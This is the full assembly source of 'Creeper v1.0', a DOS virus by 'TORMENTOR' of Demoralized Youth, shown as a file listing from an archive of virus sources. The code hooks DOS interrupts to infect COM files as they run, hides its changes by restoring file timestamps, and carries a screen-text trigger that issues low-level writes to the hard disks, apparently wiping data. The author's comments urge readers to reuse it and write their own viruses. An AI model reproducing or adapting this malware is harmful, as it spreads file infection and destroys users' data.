home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / c / creeper.asm < prev    next >
Encoding:
Assembly Source File  |  1998-01-14  |  5.5 KB  |  329 lines
  1. ;
  2. ;    Demoralized Youth proudly presents:    Creeper v1.0, Original Source
  3. ;
  4. ;            Written by:    TORMENTOR    
  6. ;    Yez, here it is... It's not like 4096 or Pogue, but it's a virus!
  7. ;    The reason why I release the original source is that I think I
  8. ;    can't do much more on this virus... I will start from scratch 
  9. ;    and write a larger and more smarter EXE-virus...
  10. ;    And if I release this source maybe YOU will get some god ideas and
  11. ;    write your own virus (or rewrite this!)...
  12. ;    And if you do, Great! Feel free to mix with it as much as you want
  13. ;    but please don't change this file!
  14. ;    Well, go on and write virus! The world is to safe!
  15. ;    
  16. ;
  17. ;    Regards / TORMENTOR
  18. ;
  19.  
  20. code        segment    byte public
  21.         assume    cs:code, ds:code, es:code, ss:code
  22.   
  23.   
  24.         org    100h
  25.   
  26.   
  27. codebeg:
  28.   
  29.  
  30.         mov    ax,043FFh        ; Remove virus from code!
  31.         int    21h
  32.  
  33. ; Let's allocate some mem!
  34.  
  35.         mov    ax,ds
  36.         sub    ax,11h
  37.         mov    ds,ax
  38.         cmp    byte ptr ds:[0100h],5Ah
  39.         jnz    skip
  40.         mov    ax,ds:[0103h]
  41.         sub    ax,40h
  42.         jb    skip
  43.         mov    ds:[0103h],ax
  44.         sub    word ptr ds:[0112h],50h
  45.         mov    es,ds:[0112h]
  46.         push    cs
  47.         pop    ds
  48.         mov    cx,code_end-codebeg
  49.         mov    di,100h
  50.         push    di
  51.         mov    si,di
  52.         rep    movsb
  53.  
  54.         push     es
  55.         pop    ds
  56.  
  57.         mov    ax,351Ch
  58.         int    21h
  59.         mov    word ptr ds:[int1Cret],bx
  60.         mov    word ptr ds:[int1Cret+2],es
  61.         mov    al,21h
  62.         int    21h
  63.         mov    word ptr ds:[real21+1],bx
  64.         mov    word ptr ds:[real21+3],es
  65.         
  66.         mov    ah,25h
  67.         mov    dx,offset int21beg
  68.         int    21h
  69.         mov    al,1Ch
  70.         mov    dx,offset int1Cnew
  71.         int    21h
  72.     
  73.         push    cs
  74.         push    cs
  75.         pop    es
  76.         pop    ds
  77.     
  78.         ret
  79.  
  80. skip:        int    20h        
  81.         
  82.  
  83. int21beg:    push    ax
  84.         sub    ax,4B00h
  85.         jz    infect
  86.         pop    ax
  87.         cmp    ax,043FFh        ; Check if Harakiri.        
  88.         jne    real21
  89.         
  90.         mov    ax,word ptr ds:[retdata]
  91.         mov    si,ax
  92.         mov    di,100h
  93.         mov    cx,code_end-codebeg
  94.         rep    movsb
  95.  
  96.         mov    ax,100h
  97.     
  98.         pop    cx
  99.         pop    cx
  100.         push    es
  101.         push    ax
  102.         iret
  103.  
  104. real21:        db    0EAh, 00h, 00h, 00h, 00h    ; Jump to org21vec.
  105.  
  106.  
  107. retdata:    db    00h, 00h
  108.  
  109. f_time:        dw    0000h
  110.  
  111. f_date:        dw    0000h    
  112.  
  113. infect:        pop    ax
  114.  
  115.         push    ax
  116.         push    bx
  117.         push    cx
  118.         push    di
  119.         push    ds
  120.         push    dx
  121.         push    si        
  122.  
  123.     
  124.         mov    ah,43h            ; Get file attr.
  125.         int    21h
  126.         mov    ax,4301h
  127.         and    cx,0FEh            ; Strip the Read-only-flag
  128.         int    21h
  129.  
  130.         mov    ax,3D02h        ; Open victim.
  131.         int    21h
  132.  
  133.         xchg    ax,bx
  134.  
  135.         call    sub_2  
  136.  
  137. sub_2:        mov    di,sp            ; God what I hate that Eskimo!
  138.         mov     si,ss:[di]
  139.         inc    sp
  140.         inc    sp
  141.  
  142.         push    cs
  143.         pop    ds
  144.  
  145.         mov    ax,5700h        ; Get file's time and date
  146.         int    21h
  147.         mov    [si-(sub_2-f_time)],cx    
  148.         mov    [si-(sub_2-f_date)],dx    ; And save them...
  149.  
  150.         mov    ah,3Fh            ; Read X byte from begin.
  151.         mov    cx,code_end-codebeg
  152.         add    si,code_end-sub_2    ; SI points to EOF    
  153.         mov    dx,si
  154.         int    21h            
  155.  
  156.         
  157.         cmp    word ptr [si],'MZ'    ; Mark Zimbowski?
  158.         je    close
  159.         cmp    word ptr [si],'ZM'    ; Zimbowski Mark?
  160.         je     close    
  161. mark:        cmp    word ptr [si+(mark-codebeg+4)],'YD'    ; infected?
  162.         je    close
  163.  
  164.         call    put_eof            ; move file ptr to EOF
  165.  
  166.         cmp    ax,(0FFFFh-(code_end-codebeg)-100h)
  167.         ja    close
  168.         cmp    ax,code_end-codebeg+100h
  169.         jb    close
  170.  
  171.         add    ax,100h
  172.         mov    word ptr ds:[si-(code_end-retdata)],ax    
  173.  
  174.         mov    ah,40h            ; Flytta beg to end.
  175.         mov    cx,code_end-codebeg
  176.         mov    dx,si
  177.         int    21h
  178.         
  179.         mov    ax,4200h        ; fptr to filbeg.
  180.         xor     cx,cx
  181.         xor     dx,dx
  182.         int    21h
  183.     
  184.         mov    ah,40h            ; Write virus to beg.
  185.         mov    cx,code_end-codebeg
  186.         mov    dx,si
  187.         sub    dx,cx
  188.         int    21h
  189.  
  190. close:        mov    ax,5701h
  191.         mov    cx,[si-(code_end-f_time)]
  192.         mov    dx,[si-(code_end-f_date)]
  193.         int    21h
  194.  
  195.         mov    ah,3Eh            
  196.         int    21h            ; close file, bx=file handle
  197.  
  198.         pop    si
  199.         pop    dx
  200.         pop    ds
  201.         pop    di
  202.         pop    cx
  203.         pop    bx
  204.         pop    ax
  205.  
  206.         
  207.         jmp    real21
  208.  
  209. put_eof:    mov     ax,4202h
  210.         xor    dx,dx
  211.         xor    cx,cx
  212.         int     21h
  213.         ret
  214.  
  215.  
  216. int1Cnew:    
  217.  
  218.         push     ax
  219.         inc     byte ptr cs:[counter]
  220.         mov     al,30h
  221.         cmp     byte ptr cs:[counter],al
  222.         jz     scan
  223.         pop     ax
  224.  
  225.  
  226. slut:        jmp     dword ptr cs:[int1Cret]
  227.  
  228. scan:       
  229.         push     bx
  230.         push     cx
  231.         push     di
  232.         push    ds
  233.         push    dx
  234.         push    es
  235.         push    si
  236.  
  237.  
  238.         push     cs
  239.         pop     ds
  240.  
  241.         cld
  242.         xor     bx,bx
  243.         mov     byte ptr cs:[counter],bh
  244.         mov     cx,0FA0h
  245.  
  246.         mov     ax,0b800h
  247.         mov     es,ax
  248.         xor     di,di
  249.  
  250. again:        mov     al,byte ptr cs:[text+bx]
  251.         sub    al,80h
  252.         repnz     scasb    
  253.         jnz     stick
  254.  
  255. maybe:        inc     di
  256.         inc     bx
  257.         cmp     bx,10d
  258.         jz    beep
  259.  
  260.         mov    al,byte ptr cs:[text+bx]
  261.         sub    al,80h
  262.         scasb
  263.         jz    maybe
  264.         xor    bx,bx
  265.         jmp    again
  266.  
  267. beep:        
  268.         xor    cx,cx
  269.         mov    bx,word ptr cs:[int1Cret]
  270.         mov    es,word ptr cs:[int1Cret+2]
  271.         mov    ax,251Ch
  272.         int    21h
  273.  
  274. overagain:    mov    dx,0180h
  275.         xor    bx,bx
  276.  
  277. reset:        mov    ah,00h
  278.         inc    bx
  279.         cmp    bl,5h
  280.         jz    raise        
  281.         inc    cx
  282.         int    13h
  283.  
  284. hoho:        mov    ax,0380h
  285.         inc    cx
  286.         int    13h
  287.         jc    reset
  288.         jmp     hoho        
  289.  
  290. raise:        xor    cx,cx
  291.         xor    bx,bx
  292.         inc    dx
  293.         cmp    dl,85h
  294.         jnz    hoho
  295.         jmp    overagain    
  296.                     
  297. stick:
  298.         pop    si        
  299.         pop    es
  300.         pop    dx
  301.         pop     ds
  302.         pop     di
  303.         pop     cx
  304.         pop     bx         
  305.         pop     ax
  306.  
  307.  
  308.         jmp     slut
  309.  
  310.  
  311. counter:    db     00h
  312.  
  313. text:         db     'T'+80h, 'O'+80h, 'R'+80h, 'M'+80h, 'E'+80h, 'N'+80h
  314.         db    'T'+80h, 'O'+80h, 'R'+80h, '!'+80h
  315.  
  316.             ; This is what it scans the screen for --^
  317.  
  318. int1Cret:    db    0EAh, 00h, 00h, 00h, 00h
  319.  
  320. code_end:                    ; THE END.
  321.  
  322. code        ends
  323. end        codebeg
  324.  
  325. ;
  326. ;  Greetings to: Charlie, HITMAN, Wiper, Torpedo, Tortuer, WiCO, Drive Screwer
  327. ;  And ALL other virus-writers!  
  328. ;
  329.